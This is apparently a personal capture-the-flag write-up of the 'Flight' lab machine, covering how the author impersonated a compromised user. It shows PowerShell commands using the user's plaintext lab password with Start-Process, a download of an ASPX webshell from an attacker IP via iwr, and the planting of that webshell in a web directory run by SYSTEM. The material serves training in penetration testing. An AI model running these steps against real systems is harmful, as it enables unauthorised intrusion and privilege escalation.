Impersonation

There are a myriad of aspects associated with the concept of impersonation in security auditing, but the current assessment specifically emphasizes writing.

an internal web server has been identified in the default windows web directory at c:\inetpub, and it was initiated and is being run by SYSTEM. within the directory, there is what appears to be an updated version of the original web application in development; c:\inetpub\development

As the process is being run under the security context of SYSTEM, compromising this internal web server process will grant privilege escalation

ps c:\inetpub\development> icacls .
  flight\c.bum:(OI)(CI)(W)
  nt service\trustedinstaller:(I)(F)
  nt service\trustedinstaller:(I)(OI)(CI)(IO)(F)
  nt authority\system:(I)(F)
  nt authority\system:(I)(OI)(CI)(IO)(F)
  builtin\administrators:(I)(F)
  builtin\administrators:(I)(OI)(CI)(IO)(F)
  builtin\users:(I)(RX)
  builtin\users:(I)(OI)(CI)(IO)(GR,GE)
  creator owner:(I)(OI)(CI)(IO)(F)
 
Successfully processed 1 files; Failed processing 0 files

checking the permission set to the c:\inetpub\development directory reveals that the current account, svc_apache, only has read and execute access.
On the other hand, the c.bum user does have write access to the directory.
- This would suggest that the c.bum user can put a web executable file here for the svc_apache account to execute
- Given that the c.bum user has already been compromised, various methods for impersonation under the user’s security context may be used

first, i would need to find a way to conduct os command execution under the security context of the c.bum user in order to write to the c:\inetpub\development directory.

Invoke-Command (failed)

PS C:\inetpub\development> $Cred = New-Object System.Management.Automation.PSCredential("FLIGHT.HTB\c.bum", (ConvertTo-SecureString "Tikkycoll_431012284" -AsPlainText -Force))
PS C:\inetpub\development> invoke-command -Computer localhost -Credential $Cred -ScriptBlock { whoami }
[localhost] Connecting to remote server localhost failed with the following error message : Access is denied. For more 
information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (localhost:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

PowerShell invoke-command cmdlet is not available for the c.bum user

runas.exe (failed)

ps c:\xampp\htdocs\school.flight.htb> cmd /c where runas.exe
c:\Windows\System32\runas.exe
 
c:\xampp\htdocs\school.flight.htb> cmdkey /add:FLIGHT.HTB /user:c.bum@flight.htb /pass:Tikkycoll_431012284
cmdkey: Credential added successfully.
c:\xampp\htdocs\school.flight.htb> runas /savecred /user:c.bum@flight.com "cmd.exe /c whoami"
enter the password for c.bum@flight.com:

runas.exe is located at C:\Windows\System32\runas.exe, yet doesn’t seem functional as it doesn’t seem to fetch credential from the credential manager

Start-Process

PS C:\tmp> $Cred = New-Object System.Management.Automation.PSCredential("FLIGHT.HTB\c.bum", (ConvertTo-SecureString "Tikkycoll_431012284" -AsPlainText -Force))
PS C:\tmp> Start-Process cmd.exe -Credential $Cred -ArgumentList "/c whoami > C:\tmp\out.txt"
PS C:\tmp> cat C:\tmp\out.txt
flight\c.bum

PowerShell Start-Process cmdlet works. I can use this method to write to the C:\inetpub\development directory

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .
PS C:\tmp> iwr -Uri http://10.10.16.8/cmdasp.aspx -Outfile C:\tmp\cmdasp.aspx

I will grab the default ASPX webshell available in Kali and transfer to the target system over HTTP This is just for PoC alone. I will employ another method escalate privileges

PS C:\tmp> Start-Process cmd.exe -Credential $Cred -ArgumentList "/c copy C:\tmp\cmdasp.aspx C:\inetpub\development\"
       1 file(s) copied.
 
PS C:\tmp> ls C:\inetpub\development
 
 
    Directory: C:\inetpub\development
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       12/11/2023  11:02 PM                css                                                                   
d-----       12/11/2023  11:02 PM                fonts                                                                 
d-----       12/11/2023  11:02 PM                img                                                                   
d-----       12/11/2023  11:02 PM                js                                                                    
-a----       12/11/2023  11:03 PM           1400 cmdasp.aspx                                                           
-a----        4/16/2018   2:23 PM           9371 contact.html                                                          
-a----        4/16/2018   2:23 PM          45949 index.html

Using the PSCredential object of the c.bum user with the PowerShell Start-Process cmdlet, I can copy the ASPX webshell to the C:\inetpub\development directory It should now be available for access as I have previously tunneled the target port 8000 to the Kali port 8000

Webshell

There it is

Interestingly, the web application is running under the security context of the IIS AppPool\DefaultAppPool account, which is the default web service account in Windows. Nonetheless, moving on to the Lateral Movement phase

InfoSec LAB

Explorer

Flight_Impersonation

Impersonation

Invoke-Command (failed)

runas.exe (failed)

Start-Process

Webshell

Interactive Graph View

Table of Contents

Backlinks